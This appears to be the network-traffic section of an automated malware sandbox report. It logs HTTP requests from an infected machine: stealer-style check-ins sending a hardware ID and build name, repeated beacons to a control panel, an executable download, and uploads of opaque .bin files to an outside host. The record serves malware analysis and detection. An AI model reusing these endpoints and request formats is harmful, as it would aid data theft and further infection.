Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJDAECAEBKJJJKEBKKJDHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 44 41 45 43 41 45 42 4b 4a 4a 4a 4b 45 42 4b 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 32 31 30 38 31 44 35 42 44 44 36 33 33 30 35 32 39 38 33 36 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 41 45 43 41 45 42 4b 4a 4a 4a 4b 45 42 4b 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 41 45 43 41 45 42 4b 4a 4a 4a 4b 45 42 4b 4b 4a 44 2d 2d 0d 0a Data Ascii: ------KJDAECAEBKJJJKEBKKJDContent-Disposition: form-data; name="hwid"D21081D5BDD63305298366------KJDAECAEBKJJJKEBKKJDContent-Disposition: form-data; name="build"mars------KJDAECAEBKJJJKEBKKJD--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 38 33 32 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1008329001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fvtekk5pn.topAccept: */*Content-Length: 462Content-Type: multipart/form-data; boundary=------------------------suWdlJFMg9moTNUBbW9GQtData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 73 75 57 64 6c 4a 46 4d 67 39 6d 6f 54 4e 55 42 62 57 39 47 51 74 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4e 6f 64 61 76 61 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 33 ea ed 13 5f a9 73 97 c9 48 56 db 8d 4a 64 fc 3a ca 5f 0a 73 28 76 c3 a8 94 4e 58 3f 51 03 39 9b a3 4e f7 ab 92 ee 2e 6b 65 dc 1a 86 6f cc ff 0f e7 29 59 7d 1c c3 3a cd 92 8a f6 4c 7d 4e cb 9d 05 9c 56 6b 4c dc b8 c6 90 f7 d8 87 81 74 02 92 97 b8 80 a1 58 29 c1 69 1b 58 35 54 59 6f 70 b0 bb f1 09 4d 6c 4b a5 ed 3d cc 14 4f 54 a3 2f 1c 1b be ef e1 15 82 7d 18 f8 8a 42 5b 34 d0 f3 9e 8b c9 cc 7a 7a b7 80 df d2 b1 cd 1b 83 5f 45 da dd c1 d1 e7 c2 03 9f 5f 6b cc ec 87 09 8e bd e8 3b 72 7f 62 f3 f6 39 db ca a1 fd f8 b1 e2 ee a8 df 88 f2 db 40 50 e0 0c b5 f0 fe 21 c5 d4 d5 a0 29 14 da 6f 8e 64 61 8c fa 31 e3 b9 ef 6d 35 98 08 8c f8 0b 90 85 ae 71 d3 6b 50 5a 23 d5 3d 7f 9e 00 c4 db 73 b7 59 49 53 c1 35 a8 0c b3 bb ef 5e 0d a8 5d 09 01 01 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 73 75 57 64 6c 4a 46 4d 67 39 6d 6f 54 4e 55 42 62 57 39 47 51 74 2d 2d 0d 0a Data Ascii: --------------------------suWdlJFMg9moTNUBbW9GQtContent-Disposition: form-data; name="file"; filename="Nodava.bin"Content-Type: application/octet-stream3_sHVJd:_s(vNX?Q9N.keo)Y}:L}NVkLtX)iX5TYopMlK=OT/}B[4zz_E_k;rb9@P!)oda1m5qkPZ#=sYIS5^]--------------------------suWdlJFMg9moTNUBbW9GQt--
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fvtekk5pn.topAccept: */*Content-Length: 81063Content-Type: multipart/form-data; boundary=------------------------Zyo9NyWcWFVCAZuiOVkg8cData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 5a 79 6f 39 4e 79 57 63 57 46 56 43 41 5a 75 69 4f 56 6b 67 38 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 51 69 72 65 72 69 66 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 56 5f 85 1d be 54 95 25 45 81 1e 96 0e d2 73 9c c6 a8 34 1f aa 68 f1 3a da 76 2b 5f db ca 58 5f 06 91 7c b0 18 2a e5 88 60 5a ec 7c 5d de e6 14 e3 18 26 42 ae c4 02 e9 3e 9b 56 98 72 19 05 22 95 a8 bf a5 e7 ab d8 e8 8b f4 ef 8a 59 44 65 b9 d2 7f c6 50 57 db 2c 0c 8a 03 a0 e2 26 b6 1f b5 40 d7 a0 39 72 c5 c1 ac a3 de 87 55 7e 76 01 fe ae 1f 03 25 c4 c9 69 fe 8a e9 d0 69 82 b8 19 3f 58 40 45 a4 25 0e d4 88 e1 90 f3 55 91 00 11 89 d2 8f 8e 57 10 fb ac b9 34 30 e2 53 60 ca db 2b 20 d5 9d b6 45 25 fd aa e9 87 ba a4 8b 5c 96 b5 6f f4 7b 4a 09 3c f1 7b 04 58 c9 f2 6e 2c b0 41 95 76 37 5f 87 dd 9c 44 05 a7 13 b7 15 b4 6c 85 5a 71 57 c8 78 98 b0 48 1e 44 89 b7 72 c6 e7 51 55 6f 1e 59 e8 6c 4c c7 70 84 e1 cd e7 45 b3 35 35 6e e1 75 d6 d4 47 e7 d4 90 b5 a9 bd bc 8b 97 31 8d 27 dc 63 8d b1 6e 67 de f3 94 44 5e 16 51 ca 9b 06 da e0 ad 69 01 3a bd c2 e2 e4 15 3f 7e 3e 22 ca 05 3b 13 5a 34 86 6a 2b dc 5e 7c 05 21 fa bd 1d a8 e7 f8 4b 4c ab 4c 24 86 74 75 0e 9e a3 2d 7b f6 3d 32 58 7f ab 4f 3f e9 15 ef 20 df 07 70 a9 b3 1b d2 0d e3 e2 b9 7d da 61 e7 cf 63 7c e5 27 0d 90 e2 cd f4 a2 66 f4 33 c5 3a ba 23 ee bf 2c ba c8 3a 2c 75 87 89 f9 09 95 cb 2c e3 bf 84 4d 9d e3 00 a2 ec bf 0d a2 fd b6 67 e2 52 b6 4f d0 32 b9 c7 62 a4 46 b1 0c 96 a3 8f ce 4d 8f 7f 42 91 24 d7 06 66 2f 62 b7 fa 65 22 aa 51 e6 8e 14 d7 00 17 b9 be 79 bb af 60 2b 79 0a c8 cd 00 f1 b8 12 64 6b 6c 3a bb 56 78 1a 72 a6 59 f7 1e 82 58 f7 ed 1f 7b 5c 1b 12 30 74 e6 c5 05 4e c5 e2 b6 35 9c 69 fc dc 28 d2 46 16 d4 50 12 20 b3 8a 09 af c5 73 09 fb 30 0f 6c d9 a3 8e 68 1e a0 ed 07 9d 4b ee 87 7c ce 02 7a 1a 58 bc 1e c8 ac 21 14 bc 25 58 ff 93 4d 74 22 e4 16 fe 1d 6b dc 3d 49 fe 8b 14 8d 62 59 7c 9b a3 51 2b af 45 b2 0c b0 8d 2b 34 47 14 6d 0e b6 46 60 bd bd c8 ce ef 9f de 4b 31 d1 13 a0 f4 42 46 65 f2 93 ed b3 bc e9 10 f9 f0 88 1e d1 28 d9 96 c0 81 b9 8a eb c7 29 56 bf 3c be 33 fe fb 3a f8 6a 28 97 41 05 a5 5e 1c 1d 3f a8 ea 35 a8 ad 43 12 7c 21 43 68 48 43 1f fe 26 19 0b b0 63 81 d4 e9 ad 08 c7 d4 81 6d 9e 8c dd 6c 1f 63 5e 95 87 bb 0b ed 7d f3 54 88 23 55 15 da 35 e2 29 9c 54 81 7a a2 2e ff 71 e7 b4 d2 43 2c 02 9a 31 ce 29 f7 07 c8 e7 b4 32 bc 0c 83 dd 69 01 6f 36 ab a5 83 41 a9 f2 cf c0 c6 7c 63 4f e3 4d e6 bd 24 28 f6 f9 87 57 b4 67 fd 34 89 5c 4f 47 54 45 f8 92 78 e0 5c 18 74 0e f9 56 36 d0 48 c8 45 e5 d4 11 07 9c 45 c1 91 85 76 a5 92 f1 c1
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 38 33 33 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1008330001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 33 32 36 37 32 42 39 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B32672B95982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAFIJKKEHJDHJKFIECAAHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 41 46 49 4a 4b 4b 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 32 31 30 38 31 44 35 42 44 44 36 33 33 30 35 32 39 38 33 36 36 0d 0a 2d 2d 2d 2d 2d 2d 41 41 46 49 4a 4b 4b 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 41 41 46 49 4a 4b 4b 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 2d 2d 0d 0a Data Ascii: ------AAFIJKKEHJDHJKFIECAAContent-Disposition: form-data; name="hwid"D21081D5BDD63305298366------AAFIJKKEHJDHJKFIECAAContent-Disposition: form-data; name="build"mars------AAFIJKKEHJDHJKFIECAA--
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fvtekk5pn.topAccept: */*Content-Length: 23416Content-Type: multipart/form-data; boundary=------------------------yB3LxmJz8bTlrUUXgF2G2sData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 79 42 33 4c 78 6d 4a 7a 38 62 54 6c 72 55 55 58 67 46 32 47 32 73 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4a 6f 63 61 62 69 68 6f 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 65 22 dd 0d 5d f3 14 8e 08 01 31 83 8e 6a 05 21 12 03 35 93 f1 72 5c b0 1f 86 73 95 f1 59 64 dd 73 57 97 ac 9a 59 da 48 4e 85 f5 e4 54 f5 f6 9c 6d 04 31 e6 d2 2a 51 43 9d 83 54 44 ed db e2 0c 0a 2a 80 91 26 8e 75 7a f9 a4 5e 30 7a 5a 21 9c 57 32 9b 88 7e fd cd 5e 86 2b c7 54 70 53 18 15 af d4 1c 76 14 1f 1d 88 58 67 8c 4e cb d7 18 37 8d a2 5f 04 a8 75 87 d2 44 ab 2a 4c 09 05 e9 cf fb 45 c9 cb e6 06 5a c9 02 ba 6a 76 c5 2d 47 05 09 9a c0 41 05 19 51 77 30 22 9e 2c 1d 08 ff 8b 3a e3 61 01 8c 26 11 40 da 4f f5 ce a9 e6 f3 fb 28 8c ad ec b0 61 8c d4 63 21 f8 4b 47 9e 68 b9 4a fa 08 e1 ed 5f 61 04 56 8e 7a 6b 45 45 25 cf 0a 71 3e 04 43 49 21 d4 33 5b 20 2c 31 b8 a3 eb c4 40 8c b4 4f 1d 9a 14 72 1b 37 53 78 df 42 0e 67 2c 94 cc 47 05 6d 4c 06 f6 33 9d bb cd 7a 3e b2 b6 c8 5a fa df 90 c5 0e e2 30 46 01 e1 fc 67 d7 80 6b 47 65 7f 25 39 5b 0a 73 bb 84 e7 74 5a 0c 6e cd b0 a7 39 dc ef d4 33 92 8e b8 fb 01 a2 f8 aa 04 2a 61 2a 10 fd 9d f4 cc f7 5e 2f 6b 2a 2b 30 00 99 22 e2 e7 cd a1 7f 40 b7 68 2c 51 85 d9 43 b3 55 ee d6 db af af 06 fc 70 c5 a5 f7 00 d3 6a e7 f3 14 2f 69 2a ef 3f c6 7f 0c b5 fc ac 96 cf 3e 0d fa 81 44 5b 78 04 13 09 29 a4 c9 ce b6 4c f6 30 8e 6d 61 df d5 cc 84 ab aa df 72 4d db 2a be 74 b7 1c cd 27 70 6c 61 7f 6c cf 5b 77 a3 fb 12 38 57 86 48 6e f1 1e cc 47 1e b1 54 ce 2a 13 33 bc e3 4d 48 11 f4 f0 d0 14 19 ef af 80 05 c9 f6 47 d2 42 23 c4 23 1e a8 ff 18 17 50 30 98 30 a0 4c 3e a2 d4 16 80 43 7b 97 b8 2b e4 bb fe cc ac 62 41 c2 06 31 0d 43 be f9 b8 e4 51 cd ab f6 4f 9b c0 2c d0 2d 96 0c c8 29 a1 7d fa f8 de 04 ee e1 d5 99 c1 96 26 c7 cc c6 48 6e c1 23 1a 24 1d 4b b5 3f 3e e1 de 28 64 16 6e fe ea 47 5f 8f 6e 10 8e c0 3b 78 7a c5 93 80 75 9e b2 8f 9f 66 08 18 49 f5 f4 b9 14 31 95 d5 9d f5 46 74 88 16 26 08 c7 39 33 e6 2c fb 37 03 d3 cd c3 39 55 a1 5a 77 24 98 88 a1 bf 78 b4 64 82 f2 a3 c2 eb 98 0d a1 5d a5 de 92 d7 eb be a6 56 b3 a7 3c e7 a6 6c e5 ac 13 6c a2 98 b8 74 33 91 7d 1c 8e 82 a5 d6 27 28 61 53 ee 30 55 86 c2 81 c8 9b 18 81 b7 8e 3d fe ad db bd d6 d0 ed 5f 84 ad ca 08 29 a5 11 90 59 63 31 d7 1e 56 a7 10 1c 2c 9a 92 32 23 bd e2 c6 be 78 f4 ca 82 14 fa cb f7 80 b3 94 52 8d ce d3 cd 52 03 57 c3 fd 0d d6 9b 55 80 0a 0f 6f 13 4c 28 ad 45 26 32 ab 77 0c 83 a4 9d be 8e 73 76 42 d1 76 38 60 0c 4f 5e bb 66 fe b4 14 f3 fa 38 cb 47 c0 59 05 aa 3b 56 3e 91 3f 50 27 21 80 96 d1 1e c5
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 33 32 36 37 32 42 39 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B32672B95982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 33 32 36 37 32 42 39 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B32672B95982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 33 32 36 37 32 42 39 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B32672B95982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 33 32 36 37 32 42 39 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B32672B95982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 33 32 36 37 32 42 39 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B32672B95982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 33 32 36 37 32 42 39 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B32672B95982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 33 32 36 37 32 42 39 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B32672B95982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 33 32 36 37 32 42 39 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B32672B95982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 33 32 36 37 32 42 39 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B32672B95982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
